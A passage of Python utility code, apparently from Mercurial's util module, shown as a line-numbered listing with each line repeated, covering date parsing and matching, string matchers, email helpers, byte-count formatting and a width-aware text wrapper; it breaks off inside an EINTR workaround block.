2057
2058 def parsedate(date, formats=None, bias=None):
2058 def parsedate(date, formats=None, bias=None):
2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2060
2060
2061 The date may be a "unixtime offset" string or in one of the specified
2061 The date may be a "unixtime offset" string or in one of the specified
2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063
2063
2064 >>> parsedate(b' today ') == parsedate(
2064 >>> parsedate(b' today ') == parsedate(
2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 True
2066 True
2067 >>> parsedate(b'yesterday ') == parsedate(
2067 >>> parsedate(b'yesterday ') == parsedate(
2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 ... ).strftime('%b %d').encode('ascii'))
2069 ... ).strftime('%b %d').encode('ascii'))
2070 True
2070 True
2071 >>> now, tz = makedate()
2071 >>> now, tz = makedate()
2072 >>> strnow, strtz = parsedate(b'now')
2072 >>> strnow, strtz = parsedate(b'now')
2073 >>> (strnow - now) < 1
2073 >>> (strnow - now) < 1
2074 True
2074 True
2075 >>> tz == strtz
2075 >>> tz == strtz
2076 True
2076 True
2077 """
2077 """
2078 if bias is None:
2078 if bias is None:
2079 bias = {}
2079 bias = {}
2080 if not date:
2080 if not date:
2081 return 0, 0
2081 return 0, 0
2082 if isinstance(date, tuple) and len(date) == 2:
2082 if isinstance(date, tuple) and len(date) == 2:
2083 return date
2083 return date
2084 if not formats:
2084 if not formats:
2085 formats = defaultdateformats
2085 formats = defaultdateformats
2086 date = date.strip()
2086 date = date.strip()
2087
2087
2088 if date == 'now' or date == _('now'):
2088 if date == 'now' or date == _('now'):
2089 return makedate()
2089 return makedate()
2090 if date == 'today' or date == _('today'):
2090 if date == 'today' or date == _('today'):
2091 date = datetime.date.today().strftime(r'%b %d')
2091 date = datetime.date.today().strftime(r'%b %d')
2092 date = encoding.strtolocal(date)
2092 date = encoding.strtolocal(date)
2093 elif date == 'yesterday' or date == _('yesterday'):
2093 elif date == 'yesterday' or date == _('yesterday'):
2094 date = (datetime.date.today() -
2094 date = (datetime.date.today() -
2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 date = encoding.strtolocal(date)
2096 date = encoding.strtolocal(date)
2097
2097
2098 try:
2098 try:
2099 when, offset = map(int, date.split(' '))
2099 when, offset = map(int, date.split(' '))
2100 except ValueError:
2100 except ValueError:
2101 # fill out defaults
2101 # fill out defaults
2102 now = makedate()
2102 now = makedate()
2103 defaults = {}
2103 defaults = {}
2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 # this piece is for rounding the specific end of unknowns
2105 # this piece is for rounding the specific end of unknowns
2106 b = bias.get(part)
2106 b = bias.get(part)
2107 if b is None:
2107 if b is None:
2108 if part[0:1] in "HMS":
2108 if part[0:1] in "HMS":
2109 b = "00"
2109 b = "00"
2110 else:
2110 else:
2111 b = "0"
2111 b = "0"
2112
2112
2113 # this piece is for matching the generic end to today's date
2113 # this piece is for matching the generic end to today's date
2114 n = datestr(now, "%" + part[0:1])
2114 n = datestr(now, "%" + part[0:1])
2115
2115
2116 defaults[part] = (b, n)
2116 defaults[part] = (b, n)
2117
2117
2118 for format in formats:
2118 for format in formats:
2119 try:
2119 try:
2120 when, offset = strdate(date, format, defaults)
2120 when, offset = strdate(date, format, defaults)
2121 except (ValueError, OverflowError):
2121 except (ValueError, OverflowError):
2122 pass
2122 pass
2123 else:
2123 else:
2124 break
2124 break
2125 else:
2125 else:
2126 raise error.ParseError(_('invalid date: %r') % date)
2126 raise error.ParseError(_('invalid date: %r') % date)
2127 # validate explicit (probably user-specified) date and
2127 # validate explicit (probably user-specified) date and
2128 # time zone offset. values must fit in signed 32 bits for
2128 # time zone offset. values must fit in signed 32 bits for
2129 # current 32-bit linux runtimes. timezones go from UTC-12
2129 # current 32-bit linux runtimes. timezones go from UTC-12
2130 # to UTC+14
2130 # to UTC+14
2131 if when < -0x80000000 or when > 0x7fffffff:
2131 if when < -0x80000000 or when > 0x7fffffff:
2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 if offset < -50400 or offset > 43200:
2133 if offset < -50400 or offset > 43200:
2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 return when, offset
2135 return when, offset
2136
2136
2137 def matchdate(date):
2137 def matchdate(date):
2138 """Return a function that matches a given date match specifier
2138 """Return a function that matches a given date match specifier
2139
2139
2140 Formats include:
2140 Formats include:
2141
2141
2142 '{date}' match a given date to the accuracy provided
2142 '{date}' match a given date to the accuracy provided
2143
2143
2144 '<{date}' on or before a given date
2144 '<{date}' on or before a given date
2145
2145
2146 '>{date}' on or after a given date
2146 '>{date}' on or after a given date
2147
2147
2148 >>> p1 = parsedate(b"10:29:59")
2148 >>> p1 = parsedate(b"10:29:59")
2149 >>> p2 = parsedate(b"10:30:00")
2149 >>> p2 = parsedate(b"10:30:00")
2150 >>> p3 = parsedate(b"10:30:59")
2150 >>> p3 = parsedate(b"10:30:59")
2151 >>> p4 = parsedate(b"10:31:00")
2151 >>> p4 = parsedate(b"10:31:00")
2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 >>> f = matchdate(b"10:30")
2153 >>> f = matchdate(b"10:30")
2154 >>> f(p1[0])
2154 >>> f(p1[0])
2155 False
2155 False
2156 >>> f(p2[0])
2156 >>> f(p2[0])
2157 True
2157 True
2158 >>> f(p3[0])
2158 >>> f(p3[0])
2159 True
2159 True
2160 >>> f(p4[0])
2160 >>> f(p4[0])
2161 False
2161 False
2162 >>> f(p5[0])
2162 >>> f(p5[0])
2163 False
2163 False
2164 """
2164 """
2165
2165
2166 def lower(date):
2166 def lower(date):
2167 d = {'mb': "1", 'd': "1"}
2167 d = {'mb': "1", 'd': "1"}
2168 return parsedate(date, extendeddateformats, d)[0]
2168 return parsedate(date, extendeddateformats, d)[0]
2169
2169
2170 def upper(date):
2170 def upper(date):
2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 for days in ("31", "30", "29"):
2172 for days in ("31", "30", "29"):
2173 try:
2173 try:
2174 d["d"] = days
2174 d["d"] = days
2175 return parsedate(date, extendeddateformats, d)[0]
2175 return parsedate(date, extendeddateformats, d)[0]
2176 except Abort:
2176 except Abort:
2177 pass
2177 pass
2178 d["d"] = "28"
2178 d["d"] = "28"
2179 return parsedate(date, extendeddateformats, d)[0]
2179 return parsedate(date, extendeddateformats, d)[0]
2180
2180
2181 date = date.strip()
2181 date = date.strip()
2182
2182
2183 if not date:
2183 if not date:
2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 elif date[0] == "<":
2185 elif date[0] == "<":
2186 if not date[1:]:
2186 if not date[1:]:
2187 raise Abort(_("invalid day spec, use '<DATE'"))
2187 raise Abort(_("invalid day spec, use '<DATE'"))
2188 when = upper(date[1:])
2188 when = upper(date[1:])
2189 return lambda x: x <= when
2189 return lambda x: x <= when
2190 elif date[0] == ">":
2190 elif date[0] == ">":
2191 if not date[1:]:
2191 if not date[1:]:
2192 raise Abort(_("invalid day spec, use '>DATE'"))
2192 raise Abort(_("invalid day spec, use '>DATE'"))
2193 when = lower(date[1:])
2193 when = lower(date[1:])
2194 return lambda x: x >= when
2194 return lambda x: x >= when
2195 elif date[0] == "-":
2195 elif date[0] == "-":
2196 try:
2196 try:
2197 days = int(date[1:])
2197 days = int(date[1:])
2198 except ValueError:
2198 except ValueError:
2199 raise Abort(_("invalid day spec: %s") % date[1:])
2199 raise Abort(_("invalid day spec: %s") % date[1:])
2200 if days < 0:
2200 if days < 0:
2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2202 % date[1:])
2202 % date[1:])
2203 when = makedate()[0] - days * 3600 * 24
2203 when = makedate()[0] - days * 3600 * 24
2204 return lambda x: x >= when
2204 return lambda x: x >= when
2205 elif " to " in date:
2205 elif " to " in date:
2206 a, b = date.split(" to ")
2206 a, b = date.split(" to ")
2207 start, stop = lower(a), upper(b)
2207 start, stop = lower(a), upper(b)
2208 return lambda x: x >= start and x <= stop
2208 return lambda x: x >= start and x <= stop
2209 else:
2209 else:
2210 start, stop = lower(date), upper(date)
2210 start, stop = lower(date), upper(date)
2211 return lambda x: x >= start and x <= stop
2211 return lambda x: x >= start and x <= stop
2212
2212
2213 def stringmatcher(pattern, casesensitive=True):
2213 def stringmatcher(pattern, casesensitive=True):
2214 """
2214 """
2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 returns the matcher name, pattern, and matcher function.
2216 returns the matcher name, pattern, and matcher function.
2217 missing or unknown prefixes are treated as literal matches.
2217 missing or unknown prefixes are treated as literal matches.
2218
2218
2219 helper for tests:
2219 helper for tests:
2220 >>> def test(pattern, *tests):
2220 >>> def test(pattern, *tests):
2221 ... kind, pattern, matcher = stringmatcher(pattern)
2221 ... kind, pattern, matcher = stringmatcher(pattern)
2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 >>> def itest(pattern, *tests):
2223 >>> def itest(pattern, *tests):
2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226
2226
2227 exact matching (no prefix):
2227 exact matching (no prefix):
2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 ('literal', 'abcdefg', [False, False, True])
2229 ('literal', 'abcdefg', [False, False, True])
2230
2230
2231 regex matching ('re:' prefix)
2231 regex matching ('re:' prefix)
2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 ('re', 'a.+b', [False, False, True])
2233 ('re', 'a.+b', [False, False, True])
2234
2234
2235 force exact matches ('literal:' prefix)
2235 force exact matches ('literal:' prefix)
2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 ('literal', 're:foobar', [False, True])
2237 ('literal', 're:foobar', [False, True])
2238
2238
2239 unknown prefixes are ignored and treated as literals
2239 unknown prefixes are ignored and treated as literals
2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 ('literal', 'foo:bar', [False, False, True])
2241 ('literal', 'foo:bar', [False, False, True])
2242
2242
2243 case insensitive regex matches
2243 case insensitive regex matches
2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 ('re', 'A.+b', [False, False, True])
2245 ('re', 'A.+b', [False, False, True])
2246
2246
2247 case insensitive literal matches
2247 case insensitive literal matches
2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 ('literal', 'ABCDEFG', [False, False, True])
2249 ('literal', 'ABCDEFG', [False, False, True])
2250 """
2250 """
2251 if pattern.startswith('re:'):
2251 if pattern.startswith('re:'):
2252 pattern = pattern[3:]
2252 pattern = pattern[3:]
2253 try:
2253 try:
2254 flags = 0
2254 flags = 0
2255 if not casesensitive:
2255 if not casesensitive:
2256 flags = remod.I
2256 flags = remod.I
2257 regex = remod.compile(pattern, flags)
2257 regex = remod.compile(pattern, flags)
2258 except remod.error as e:
2258 except remod.error as e:
2259 raise error.ParseError(_('invalid regular expression: %s')
2259 raise error.ParseError(_('invalid regular expression: %s')
2260 % e)
2260 % e)
2261 return 're', pattern, regex.search
2261 return 're', pattern, regex.search
2262 elif pattern.startswith('literal:'):
2262 elif pattern.startswith('literal:'):
2263 pattern = pattern[8:]
2263 pattern = pattern[8:]
2264
2264
2265 match = pattern.__eq__
2265 match = pattern.__eq__
2266
2266
2267 if not casesensitive:
2267 if not casesensitive:
2268 ipat = encoding.lower(pattern)
2268 ipat = encoding.lower(pattern)
2269 match = lambda s: ipat == encoding.lower(s)
2269 match = lambda s: ipat == encoding.lower(s)
2270 return 'literal', pattern, match
2270 return 'literal', pattern, match
2271
2271
2272 def shortuser(user):
2272 def shortuser(user):
2273 """Return a short representation of a user name or email address."""
2273 """Return a short representation of a user name or email address."""
2274 f = user.find('@')
2274 f = user.find('@')
2275 if f >= 0:
2275 if f >= 0:
2276 user = user[:f]
2276 user = user[:f]
2277 f = user.find('<')
2277 f = user.find('<')
2278 if f >= 0:
2278 if f >= 0:
2279 user = user[f + 1:]
2279 user = user[f + 1:]
2280 f = user.find(' ')
2280 f = user.find(' ')
2281 if f >= 0:
2281 if f >= 0:
2282 user = user[:f]
2282 user = user[:f]
2283 f = user.find('.')
2283 f = user.find('.')
2284 if f >= 0:
2284 if f >= 0:
2285 user = user[:f]
2285 user = user[:f]
2286 return user
2286 return user
2287
2287
2288 def emailuser(user):
2288 def emailuser(user):
2289 """Return the user portion of an email address."""
2289 """Return the user portion of an email address."""
2290 f = user.find('@')
2290 f = user.find('@')
2291 if f >= 0:
2291 if f >= 0:
2292 user = user[:f]
2292 user = user[:f]
2293 f = user.find('<')
2293 f = user.find('<')
2294 if f >= 0:
2294 if f >= 0:
2295 user = user[f + 1:]
2295 user = user[f + 1:]
2296 return user
2296 return user
2297
2297
2298 def email(author):
2298 def email(author):
2299 '''get email of author.'''
2299 '''get email of author.'''
2300 r = author.find('>')
2300 r = author.find('>')
2301 if r == -1:
2301 if r == -1:
2302 r = None
2302 r = None
2303 return author[author.find('<') + 1:r]
2303 return author[author.find('<') + 1:r]
2304
2304
2305 def ellipsis(text, maxlength=400):
2305 def ellipsis(text, maxlength=400):
2306 """Trim string to at most maxlength (default: 400) columns in display."""
2306 """Trim string to at most maxlength (default: 400) columns in display."""
2307 return encoding.trim(text, maxlength, ellipsis='...')
2307 return encoding.trim(text, maxlength, ellipsis='...')
2308
2308
2309 def unitcountfn(*unittable):
2309 def unitcountfn(*unittable):
2310 '''return a function that renders a readable count of some quantity'''
2310 '''return a function that renders a readable count of some quantity'''
2311
2311
2312 def go(count):
2312 def go(count):
2313 for multiplier, divisor, format in unittable:
2313 for multiplier, divisor, format in unittable:
2314 if abs(count) >= divisor * multiplier:
2314 if abs(count) >= divisor * multiplier:
2315 return format % (count / float(divisor))
2315 return format % (count / float(divisor))
2316 return unittable[-1][2] % count
2316 return unittable[-1][2] % count
2317
2317
2318 return go
2318 return go
2319
2319
2320 def processlinerange(fromline, toline):
2320 def processlinerange(fromline, toline):
2321 """Check that linerange <fromline>:<toline> makes sense and return a
2321 """Check that linerange <fromline>:<toline> makes sense and return a
2322 0-based range.
2322 0-based range.
2323
2323
2324 >>> processlinerange(10, 20)
2324 >>> processlinerange(10, 20)
2325 (9, 20)
2325 (9, 20)
2326 >>> processlinerange(2, 1)
2326 >>> processlinerange(2, 1)
2327 Traceback (most recent call last):
2327 Traceback (most recent call last):
2328 ...
2328 ...
2329 ParseError: line range must be positive
2329 ParseError: line range must be positive
2330 >>> processlinerange(0, 5)
2330 >>> processlinerange(0, 5)
2331 Traceback (most recent call last):
2331 Traceback (most recent call last):
2332 ...
2332 ...
2333 ParseError: fromline must be strictly positive
2333 ParseError: fromline must be strictly positive
2334 """
2334 """
2335 if toline - fromline < 0:
2335 if toline - fromline < 0:
2336 raise error.ParseError(_("line range must be positive"))
2336 raise error.ParseError(_("line range must be positive"))
2337 if fromline < 1:
2337 if fromline < 1:
2338 raise error.ParseError(_("fromline must be strictly positive"))
2338 raise error.ParseError(_("fromline must be strictly positive"))
2339 return fromline - 1, toline
2339 return fromline - 1, toline
2340
2340
2341 bytecount = unitcountfn(
2341 bytecount = unitcountfn(
2342 (100, 1 << 30, _('%.0f GB')),
2342 (100, 1 << 30, _('%.0f GB')),
2343 (10, 1 << 30, _('%.1f GB')),
2343 (10, 1 << 30, _('%.1f GB')),
2344 (1, 1 << 30, _('%.2f GB')),
2344 (1, 1 << 30, _('%.2f GB')),
2345 (100, 1 << 20, _('%.0f MB')),
2345 (100, 1 << 20, _('%.0f MB')),
2346 (10, 1 << 20, _('%.1f MB')),
2346 (10, 1 << 20, _('%.1f MB')),
2347 (1, 1 << 20, _('%.2f MB')),
2347 (1, 1 << 20, _('%.2f MB')),
2348 (100, 1 << 10, _('%.0f KB')),
2348 (100, 1 << 10, _('%.0f KB')),
2349 (10, 1 << 10, _('%.1f KB')),
2349 (10, 1 << 10, _('%.1f KB')),
2350 (1, 1 << 10, _('%.2f KB')),
2350 (1, 1 << 10, _('%.2f KB')),
2351 (1, 1, _('%.0f bytes')),
2351 (1, 1, _('%.0f bytes')),
2352 )
2352 )
2353
2353
2354 # Matches a single EOL which can either be a CRLF where repeated CR
2354 # Matches a single EOL which can either be a CRLF where repeated CR
2355 # are removed or a LF. We do not care about old Macintosh files, so a
2355 # are removed or a LF. We do not care about old Macintosh files, so a
2356 # stray CR is an error.
2356 # stray CR is an error.
2357 _eolre = remod.compile(br'\r*\n')
2357 _eolre = remod.compile(br'\r*\n')
2358
2358
2359 def tolf(s):
2359 def tolf(s):
2360 return _eolre.sub('\n', s)
2360 return _eolre.sub('\n', s)
2361
2361
2362 def tocrlf(s):
2362 def tocrlf(s):
2363 return _eolre.sub('\r\n', s)
2363 return _eolre.sub('\r\n', s)
2364
2364
2365 if pycompat.oslinesep == '\r\n':
2365 if pycompat.oslinesep == '\r\n':
2366 tonativeeol = tocrlf
2366 tonativeeol = tocrlf
2367 fromnativeeol = tolf
2367 fromnativeeol = tolf
2368 else:
2368 else:
2369 tonativeeol = pycompat.identity
2369 tonativeeol = pycompat.identity
2370 fromnativeeol = pycompat.identity
2370 fromnativeeol = pycompat.identity
2371
2371
2372 def escapestr(s):
2372 def escapestr(s):
2373 # call underlying function of s.encode('string_escape') directly for
2373 # call underlying function of s.encode('string_escape') directly for
2374 # Python 3 compatibility
2374 # Python 3 compatibility
2375 return codecs.escape_encode(s)[0]
2375 return codecs.escape_encode(s)[0]
2376
2376
2377 def unescapestr(s):
2377 def unescapestr(s):
2378 return codecs.escape_decode(s)[0]
2378 return codecs.escape_decode(s)[0]
2379
2379
2380 def forcebytestr(obj):
2380 def forcebytestr(obj):
2381 """Portably format an arbitrary object (e.g. exception) into a byte
2381 """Portably format an arbitrary object (e.g. exception) into a byte
2382 string."""
2382 string."""
2383 try:
2383 try:
2384 return pycompat.bytestr(obj)
2384 return pycompat.bytestr(obj)
2385 except UnicodeEncodeError:
2385 except UnicodeEncodeError:
2386 # non-ascii string, may be lossy
2386 # non-ascii string, may be lossy
2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388
2388
2389 def uirepr(s):
2389 def uirepr(s):
2390 # Avoid double backslash in Windows path repr()
2390 # Avoid double backslash in Windows path repr()
2391 return repr(s).replace('\\\\', '\\')
2391 return repr(s).replace('\\\\', '\\')
2392
2392
2393 # delay import of textwrap
2393 # delay import of textwrap
2394 def MBTextWrapper(**kwargs):
2394 def MBTextWrapper(**kwargs):
2395 class tw(textwrap.TextWrapper):
2395 class tw(textwrap.TextWrapper):
2396 """
2396 """
2397 Extend TextWrapper for width-awareness.
2397 Extend TextWrapper for width-awareness.
2398
2398
2399 Neither number of 'bytes' in any encoding nor 'characters' is
2399 Neither number of 'bytes' in any encoding nor 'characters' is
2400 appropriate to calculate terminal columns for specified string.
2400 appropriate to calculate terminal columns for specified string.
2401
2401
2402 Original TextWrapper implementation uses built-in 'len()' directly,
2402 Original TextWrapper implementation uses built-in 'len()' directly,
2403 so overriding is needed to use width information of each characters.
2403 so overriding is needed to use width information of each characters.
2404
2404
2405 In addition, characters classified into 'ambiguous' width are
2405 In addition, characters classified into 'ambiguous' width are
2406 treated as wide in East Asian area, but as narrow in other.
2406 treated as wide in East Asian area, but as narrow in other.
2407
2407
2408 This requires use decision to determine width of such characters.
2408 This requires use decision to determine width of such characters.
2409 """
2409 """
2410 def _cutdown(self, ucstr, space_left):
2410 def _cutdown(self, ucstr, space_left):
2411 l = 0
2411 l = 0
2412 colwidth = encoding.ucolwidth
2412 colwidth = encoding.ucolwidth
2413 for i in xrange(len(ucstr)):
2413 for i in xrange(len(ucstr)):
2414 l += colwidth(ucstr[i])
2414 l += colwidth(ucstr[i])
2415 if space_left < l:
2415 if space_left < l:
2416 return (ucstr[:i], ucstr[i:])
2416 return (ucstr[:i], ucstr[i:])
2417 return ucstr, ''
2417 return ucstr, ''
2418
2418
2419 # overriding of base class
2419 # overriding of base class
2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 space_left = max(width - cur_len, 1)
2421 space_left = max(width - cur_len, 1)
2422
2422
2423 if self.break_long_words:
2423 if self.break_long_words:
2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 cur_line.append(cut)
2425 cur_line.append(cut)
2426 reversed_chunks[-1] = res
2426 reversed_chunks[-1] = res
2427 elif not cur_line:
2427 elif not cur_line:
2428 cur_line.append(reversed_chunks.pop())
2428 cur_line.append(reversed_chunks.pop())
2429
2429
2430 # this overriding code is imported from TextWrapper of Python 2.6
2430 # this overriding code is imported from TextWrapper of Python 2.6
2431 # to calculate columns of string by 'encoding.ucolwidth()'
2431 # to calculate columns of string by 'encoding.ucolwidth()'
2432 def _wrap_chunks(self, chunks):
2432 def _wrap_chunks(self, chunks):
2433 colwidth = encoding.ucolwidth
2433 colwidth = encoding.ucolwidth
2434
2434
2435 lines = []
2435 lines = []
2436 if self.width <= 0:
2436 if self.width <= 0:
2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438
2438
2439 # Arrange in reverse order so items can be efficiently popped
2439 # Arrange in reverse order so items can be efficiently popped
2440 # from a stack of chucks.
2440 # from a stack of chucks.
2441 chunks.reverse()
2441 chunks.reverse()
2442
2442
2443 while chunks:
2443 while chunks:
2444
2444
2445 # Start the list of chunks that will make up the current line.
2445 # Start the list of chunks that will make up the current line.
2446 # cur_len is just the length of all the chunks in cur_line.
2446 # cur_len is just the length of all the chunks in cur_line.
2447 cur_line = []
2447 cur_line = []
2448 cur_len = 0
2448 cur_len = 0
2449
2449
2450 # Figure out which static string will prefix this line.
2450 # Figure out which static string will prefix this line.
2451 if lines:
2451 if lines:
2452 indent = self.subsequent_indent
2452 indent = self.subsequent_indent
2453 else:
2453 else:
2454 indent = self.initial_indent
2454 indent = self.initial_indent
2455
2455
2456 # Maximum width for this line.
2456 # Maximum width for this line.
2457 width = self.width - len(indent)
2457 width = self.width - len(indent)
2458
2458
2459 # First chunk on line is whitespace -- drop it, unless this
2459 # First chunk on line is whitespace -- drop it, unless this
2460 # is the very beginning of the text (i.e. no lines started yet).
2460 # is the very beginning of the text (i.e. no lines started yet).
2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 del chunks[-1]
2462 del chunks[-1]
2463
2463
2464 while chunks:
2464 while chunks:
2465 l = colwidth(chunks[-1])
2465 l = colwidth(chunks[-1])
2466
2466
2467 # Can at least squeeze this chunk onto the current line.
2467 # Can at least squeeze this chunk onto the current line.
2468 if cur_len + l <= width:
2468 if cur_len + l <= width:
2469 cur_line.append(chunks.pop())
2469 cur_line.append(chunks.pop())
2470 cur_len += l
2470 cur_len += l
2471
2471
2472 # Nope, this line is full.
2472 # Nope, this line is full.
2473 else:
2473 else:
2474 break
2474 break
2475
2475
2476 # The current line is full, and the next chunk is too big to
2476 # The current line is full, and the next chunk is too big to
2477 # fit on *any* line (not just this one).
2477 # fit on *any* line (not just this one).
2478 if chunks and colwidth(chunks[-1]) > width:
2478 if chunks and colwidth(chunks[-1]) > width:
2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2480
2480
2481 # If the last chunk on this line is all whitespace, drop it.
2481 # If the last chunk on this line is all whitespace, drop it.
2482 if (self.drop_whitespace and
2482 if (self.drop_whitespace and
2483 cur_line and cur_line[-1].strip() == r''):
2483 cur_line and cur_line[-1].strip() == r''):
2484 del cur_line[-1]
2484 del cur_line[-1]
2485
2485
2486 # Convert current line back to a string and store it in list
2486 # Convert current line back to a string and store it in list
2487 # of all lines (return value).
2487 # of all lines (return value).
2488 if cur_line:
2488 if cur_line:
2489 lines.append(indent + r''.join(cur_line))
2489 lines.append(indent + r''.join(cur_line))
2490
2490
2491 return lines
2491 return lines
2492
2492
2493 global MBTextWrapper
2493 global MBTextWrapper
2494 MBTextWrapper = tw
2494 MBTextWrapper = tw
2495 return tw(**kwargs)
2495 return tw(**kwargs)
2496
2496
2497 def wrap(line, width, initindent='', hangindent=''):
2497 def wrap(line, width, initindent='', hangindent=''):
2498 maxindent = max(len(hangindent), len(initindent))
2498 maxindent = max(len(hangindent), len(initindent))
2499 if width <= maxindent:
2499 if width <= maxindent:
2500 # adjust for weird terminal size
2500 # adjust for weird terminal size
2501 width = max(78, maxindent + 1)
2501 width = max(78, maxindent + 1)
2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 pycompat.sysstr(encoding.encodingmode))
2503 pycompat.sysstr(encoding.encodingmode))
2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 pycompat.sysstr(encoding.encodingmode))
2505 pycompat.sysstr(encoding.encodingmode))
2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 pycompat.sysstr(encoding.encodingmode))
2507 pycompat.sysstr(encoding.encodingmode))
2508 wrapper = MBTextWrapper(width=width,
2508 wrapper = MBTextWrapper(width=width,
2509 initial_indent=initindent,
2509 initial_indent=initindent,
2510 subsequent_indent=hangindent)
2510 subsequent_indent=hangindent)
2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512
2512
2513 if (pyplatform.python_implementation() == 'CPython' and
2513 if (pyplatform.python_implementation() == 'CPython' and
2514 sys.version_info < (3, 0)):
2514 sys.version_info < (3, 0)):
2515 # There is an issue in CPython that some IO methods do not handle EINTR
2515 # There is an issue in CPython that some IO methods do not handle EINTR
2516 # correctly. The following table shows what CPython version (and functions)
2516 # correctly. The following table shows what CPython version (and functions)
2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 #
2518 #
2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 # --------------------------------------------------
2520 # --------------------------------------------------
2521 # fp.__iter__ | buggy | buggy | okay
2521 # fp.__iter__ | buggy | buggy | okay
2522 # fp.read* | buggy | okay [1] | okay
2522 # fp.read* | buggy | okay [1] | okay
2523 #
2523 #
2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 #
2525 #
2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 #
2528 #
2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 # fp.__iter__ but not other fp.read* methods.
2532 # fp.__iter__ but not other fp.read* methods.
2533 #
2533 #
2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 # to minimize the performance impact.
2538 # to minimize the performance impact.
2539 if sys.version_info >= (2, 7, 4):
2539 if sys.version_info >= (2, 7, 4):
2540 # fp.readline deals with EINTR correctly, use it as a workaround.
